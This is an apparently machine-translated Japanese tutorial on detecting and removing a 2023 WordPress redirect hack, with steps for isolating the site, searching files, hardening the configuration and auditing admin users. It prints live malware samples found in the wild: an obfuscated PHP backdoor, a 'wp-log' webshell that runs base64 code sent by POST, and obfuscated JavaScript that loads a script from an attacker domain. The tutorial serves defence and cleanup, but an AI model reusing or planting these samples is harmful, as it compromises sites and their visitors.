WordPressは間違いなく最も使用されているプラットフォームです CMS (Content Management System) ブログとオンラインスターターストア(WooCommerceモジュールを使用)の両方で、コンピューター攻撃(ハッキング)で最もターゲットにされています。最も使用されているハッキングオペレーションの1つは、侵害されたWebサイトを他のWebページにリダイレクトすることを目的としています。 Redirect WordPress Hack 2023は、サイト全体をスパムWebページにリダイレクトするために影響を与えるか、ユーザーのコンピューターをウイルスできる比較的新しいマルウェアです。
コンテンツ
WordPressで開発されたサイトが別のサイトでリダイレクトされている場合、被害者はすでに有名なリダイレクトハックです。
このチュートリアルでは、リダイレクトに感染したウェブサイトを却下できる必要な情報と有用なヒントを見つけることができます WordPress Hack (Virus Redirect)。コメントを通じて、追加情報を取得したり、助けを求めたりすることができます。
WordPressサイトをリダイレクトするウイルスの検出
サイトのトラフィックの突然の不当な減少は、オンラインストアの場合(オンラインストアの場合)注文の数を減らすか、広告領収書は、何かが正しくないという最初の兆候です。検出 “Redirect WordPress Hack 2023” (ウイルスをリダイレクト)することができます “ビジュアル” ウェブサイトを開くと、別のウェブページにリダイレクトされます。
経験から、ほとんどのWebマルウェアアプリケーションはインターネットブラウザーと互換性があります。 Chrome, Firefox, Edge, Opera。 Macコンピューターユーザーの場合、これらのウイルスはSafariブラウザではあまり見えません。 Safariセキュリティシステムは、これらの悪意のあるスクリプトを暗黙のうちにブロックします。
WordPressハックワードハックウイルスWebサイトをお持ちの場合はどうする必要がありますか
最初の尺度は、ウェブサイトをパニックに陥れたり削除したりしないことを願っています。ウイルスまたはウイルスのファイルでさえ、第1フェーズで削除する必要はありません。それらには、セキュリティ侵害がどこにあり、ウイルスが影響を与えたかを理解するのに役立つ貴重な情報が含まれています。モーダス手術。
一般の人々のためにウェブサイトを閉じてください。
訪問者のためにウイルスのウェブサイトをどのように閉鎖しますか? 最も簡単なのは、DNSマネージャーを使用して、そのIPを削除することです “a” (ドメイン名)または存在しないIPを定義します。したがって、Webサイトの訪問者は、ウイルスまたはスパムWebページに搭載できるこのリダイレクトWordPressハックから保護されます。
使用する場合 CloudFlare DNSマネージャーとして、アカウントで認証し、DNSレコードを削除します “A” ドメイン名の場合。したがって、ウイルスの影響を受ける領域はIPなしで残り、インターネットからアクセスすることができません。
ウェブサイトのIPをコピーして実行します “ルート” あなただけにアクセスできるように。お使いのコンピューターから。
Windowsコンピューター上のWebサイトの実際のIPをどのように変更しますか?
この方法は、ファイルを編集して特定のWebサイトへのアクセスをブロックするためによく使用されます “ホスト”。
1.ノートパッドまたはその他のテキストエディターを開き(管理者の権利を使用)、ファイルを編集します “hosts“。にあります:
C:\Windows\System32\drivers\etc\hosts2。ファイル内 “ホスト” 追加 “ルート” あなたのウェブサイトの本当のIPに。上記のDNSマネージャーから削除されたIP。
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld3.ファイルを保存して、ブラウザのWebサイトにアクセスします。
ウェブサイトが開かれず、ファイルで間違いを犯さなかった場合 “ホスト”、ほとんどの場合、DNSキャッシュです。
WindowsオペレーティングシステムでDNSキャッシュを削除するには、コマンドプロンプトを開きます。ここで、次を実行します。
ipconfig /flushdnsMac / MacBookコンピューターのWebサイトの実際のIPをどのように変更しますか?
Macコンピューターユーザーの場合、Webサイトの実際のIPを変更する方が少し簡単です。
1.ユーティリティを開きます Terminal。
2。コマンドラインを実行します(実行にはシステムパスワードが必要です):
sudo nano /etc/hosts3。Windowsコンピューターについては、ドメインの実際のIPを追加します。
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld4。変更を保存します。 Ctrl+X (y)。
あなたがやった後 “ルート”、WordPress Hack Word Hack Virus Webサイトにアクセスできるのはあなただけです。
フルバックアップWebサイト – ファイルとデータベース
それがウイルスであっても “WordPressハックをリダイレクトします”、推奨事項は、Webサイト全体の一般的なバックアップを作成することです。ファイルとデータベース。おそらく、両方のファイルのローカルコピーをに保存できます public / public_html データベースと同様に。
ウイルスの識別とリダイレクトワードプレスハック2023の修正ファイル
の主なターゲットファイル WordPress 私は index.php (ルートで)、 header.php、 index.php そして footer.php WordPress Activeテーマの。これらのファイルを手動で確認し、MalicIDコードまたはマルウェアスクリプトを識別します。
2023年、タイプウイルス “WordPressハックをリダイレクトします” 入れてください index.php フォームコード:
(これらのコードを実行することはお勧めしません!)
<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20=' TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>デコードされた、これ スクリプトマルウェア それは実際にはWordPress Webサイトの結果です。マルウェアアプリケーションの基礎であるのはスクリプトではありませんが、ウイルスのWebページをリダイレクトできるのはスクリプトです。上記のスクリプトをデコードすると、次のようになります。
<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
このコードを含むサーバー上のすべてのファイルを示すために、アクセスできるのは良いことです SSH サーバーにLinuxでチェックアップおよび管理ファイルを実行します。
関連している: Google検索の助けを借りて、ウイルスのブログを持っているかどうかをどのように見つけますか。 (WordPressウイルス)
以下は、特定のコード(文字列)を含む最近変更されたファイルとファイルを識別するのに確かに役立つ2つのコマンドです。
PHPファイルが過去24時間で変更された、またはLinuxの別の時間範囲でどのように変更されていますか?
指示 “find” 使用は非常に簡単で、パーソナライズが期間を設定できるようにします。これは、ファイルの検索とタイプが作成されるパッチです。
find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"出力では、ファイルが変更された日時に関する情報、書き込み /読み取り /実行許可証を受け取ります(chmod)そして、そのグループ /ユーザーは属します。
数日前に確認したい場合は、値を変更します “-mtime -1” または使用します “-mmin -360” 数分(6時間)。
PHPファイル内のコード(文字列)をどのように探していますか?
コマンドライン “探す” 特定のコードを含むすべてのPHPまたはJavaファイルをすばやく見つけることができます。
find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +注文はファイルを検索および表示します .php そして .js 含む “uJjBRODYsU“。
上記の2つの注文の助けを借りて、最近どのファイルが変更され、マルウェアコードが含まれているかを非常に簡単に見つけることができます。
正しいコードを損なうことなく、変更されたファイルからマルウェアを削除します。私のシナリオでは、マルウェアコードが開く前に配置されました <head>。
最初の注文の実行時 “探す” サーバー上で新しいファイルを発見することは非常に可能です。これは、WordPressでもありません。 WordPress Hack Redirect Virusを宣言しているファイル。
私が調査したシナリオでは、フォームファイルがサーバーに表示されました “wp-log-nOXdgD.php“。これらはファイルです “世代” また、リダイレクトウイルスで使用されるマルウェアコードも含まれています。
<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}タイプファイルの目的 “wp-log-*” リダイレクトハックウイルスやサーバーにホストされている他のWebサイトを広めることです。タイプマルウェアコードです “webshell” 1つで構成されています 基本セクション (いくつかの暗号化された変数が定義されている)およびo 実行セクション 攻撃者は、システム内のマルウェアコードをロードして実行しようとします。
変数がある場合 POST 呼び出されました ‘bh‘ そして、その暗号化された値 MD5 に等しい “8f1f964a4b4d8d1ac3f0386693d28d03“、その後、スクリプトは暗号化されたコンテンツを書いているようです base64 呼ばれる別の変数の ‘b3‘ 一時的なファイルで、この一時ファイルを含めるようにしてください。
変数がある場合 POST または GET 呼び出されました ‘tick'スクリプトは値で応答します MD5 文字列の “885“。
このコードを含むサーバー上のすべてのファイルを識別するには、共通の文字列を選択してから、のコマンドを実行します “find” (上記と同様)。 このマルウェアコードを含むすべてのファイルを削除します。
リダイレクトWordPressハックによって運用されるセキュリティ侵害
ほとんどの場合、このリダイレクトウイルスは届きます WordPress Administrationユーザーの搾取 またはaを識別します 脆弱なプラグイン これにより、管理者の特権を持つユーザーを追加できます。
WordPressプラットフォームに基づいて構築されたほとんどのWebサイトでは可能です テーマまたはプラグインのテーマを編集します管理インターフェイスに(Dashboard)。したがって、悪意のある人は、上記のスクリプトを生成するテーママルウェアのファイルを追加できます。
そのようなマルウェアの例はこれです:
<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>JavaScript ラベルを開いた直後に、WordPressテーマヘッダーで識別されます <head>。
このJavaScriptを解読することは非常に困難ですが、別のWebアドレスがファイルを作成するために他のスクリプトを提供する可能性が最も高いことは明らかです “wp-log-*” 私が上で話したことについて。
すべてのファイルからこのコードを検索して削除します PHP 影響を受ける。
私が理解できる限り、このコードは 手動で追加されました 管理特権を持つ新しいユーザーによる。
したがって、ダッシュボードにマルウェアの追加を防ぐために、ダッシュボードでWordPress /プラグインを無効にすることをお勧めします。
ファイルを編集します wp-config.php そして、行を追加します:
define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);この変更を行った後、WordPressユーザーがダッシュボードファイルを編集することはできません。
管理者の役割でユーザーを確認してください
以下は、WordPressプラットフォームで管理者を持つユーザーを検索するために使用できるSQLクエリです。
SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'このクエリは、テーブル内のすべてのユーザーを返します wp_users 管理者の役割に起因する人。クエリはテーブルに対して行われます wp_usermeta メタで検索します ‘wp_capabilities'、ユーザーの役割に関する情報が含まれています。
別の方法は、それらを識別することです。 Dashboard → Users → All Users → Administrator。しかし、私はユーザーをダッシュボードパネルに隠すことができることを練習しています。したがって、ユーザーを見るための最良の方法 “管理者” WordPressは上記のSQLコマンドです。
私の場合、私はデータベースでユーザーを名前を付けて識別しました “wp-import-user“。非常に示唆的です。
ここから、WordPressユーザーが作成された日付と時刻を確認できます。ユーザーのユーザーも、サーバーログを見ていたため、非常に重要です。これにより、このユーザーのすべてのアクティビティを確認できます。
管理者の役割でユーザーを削除します あなたが知らないこと パスワードを変更します すべての管理ユーザーに。編集者、著者、管理者。
SQLユーザーのパスワードをデータベースに変更します 影響を受けたウェブサイトの。
これらの手順を実行した後、すべてのユーザーのためにWebサイトを再起動できます。
ただし、上記で提示したのは、2023年にWebサイトがリダイレクトWordPressハックを使用している数千の唾の1つであることに注意してください。
あなたのウェブサイトがウイルスであり、助けが必要な場合、または懸念がある場合は、コメントボックスが開いています。
